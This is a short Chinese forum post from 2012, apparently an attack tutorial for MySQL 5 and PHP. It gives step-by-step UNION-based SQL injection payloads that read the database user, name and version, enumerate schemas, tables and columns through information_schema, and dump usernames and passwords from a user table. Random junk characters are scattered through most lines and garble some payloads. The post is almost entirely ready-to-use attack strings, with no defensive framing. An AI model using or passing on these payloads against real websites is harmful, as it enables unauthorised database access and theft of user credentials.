0 h8 m/ }3 X- S g- v教程内容:Mysql 5+php 注入1 a5 l0 K" F+ ]) @. Q
( a3 r" u) g; h* I/ |* ~3 t- E9 G1 x) t
* b# i1 s, C( b2 e0 Q7 [* R一.查看MYSQL基本信息(库名,版本,用户); Q( E& v; N& T2 E$ x5 b
$ ~. w! W( B6 H# V5 P
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/* ?) S& B: [& N. Y
/ f/ J7 a& o$ q
二.查数据库: g" y$ ` _5 L: B; I' \3 w% @
, l4 A; v9 G6 m9 k/ J
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*/ q8 I7 d1 ]/ J" L% N
limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。7 w% s0 u. |- b# _
: X9 {0 r" o3 z1 W) O三.暴表
" D1 O7 n' `7 {# @2 r/ [# O4 _/ F8 H* W% y, S# R% O
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*' ~0 q* ?3 r H" [; m7 a9 x# q
; c8 `" j! m- G; Y) |: G
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。5 `2 u5 Y. X a" m6 e: T- H
; p( X" b# @" N1 R: n- ?: f% _
四.暴字段
' d0 t1 L7 M( t' B5 n
: L. c. D9 ?, e: m4 |9 t! Uand 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
' e, G& B: l9 [9 r6 t7 h! Y, ]3 _1 \
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。" Z7 m; L% x. e# v
/ z7 c8 Y$ Y' e4 O
五.暴数据7 G+ _, f0 ?4 q3 v% [8 q C5 I; h
- J, ~: u2 |+ C' z7 p( Sand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*
3 f; B/ o+ [. c" i- F6 y4 g2 }5 Z0 }$ S% A) G
# s# z, [% ]" O, n: G2 Z* K- U9 Q' \
这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。
2 T! L* b- s+ D3 Q; M |
发表于 2012-9-13 16:27:53
收藏
支持
反对